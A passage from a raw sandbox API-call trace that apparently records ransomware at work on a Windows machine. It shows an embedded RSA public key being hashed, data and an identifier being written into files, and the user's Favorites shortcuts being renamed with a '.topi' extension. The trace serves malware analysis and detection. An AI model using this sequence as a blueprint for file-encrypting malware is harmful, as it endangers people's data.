hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.454] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.454] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03498 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03450 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a028b8 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.455] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.455] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.455] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.455] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.455] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.456] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.456] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.456] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.456] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.456] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.456] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.456] CloseHandle (hObject=0x6a8) returned 1 [0096.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa0) returned 0x317ebb8 [0096.457] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0096.457] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x317ebb8 | out: hHeap=0x680000) returned 1 [0096.457] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Entertainment.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn entertainment.url.topi")) returned 1 [0096.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.458] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.458] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.459] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0096.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.459] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.459] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.459] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url") returned=".url" [0096.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.462] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.462] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.465] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.465] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.467] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.467] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.467] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.467] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.467] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.467] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.467] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.468] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.468] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.468] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.468] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.468] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.468] GetLastError () returned 0x0 [0096.469] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.469] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.469] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.469] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.469] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.469] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.469] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.469] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.469] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a028b8 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02900 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03438 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.469] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.469] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d98e8 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x9a03438 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.470] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.470] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.471] GetCurrentThreadId () returned 0x8c4 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7ec0 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.471] GetCurrentThreadId () returned 0x8c4 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0096.471] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.471] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0096.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03438 [0096.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03450 [0096.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03468 [0096.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.472] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03480 [0096.472] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03498 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a034b0 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03498 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a03498 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03480 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.473] HeapFree (in: 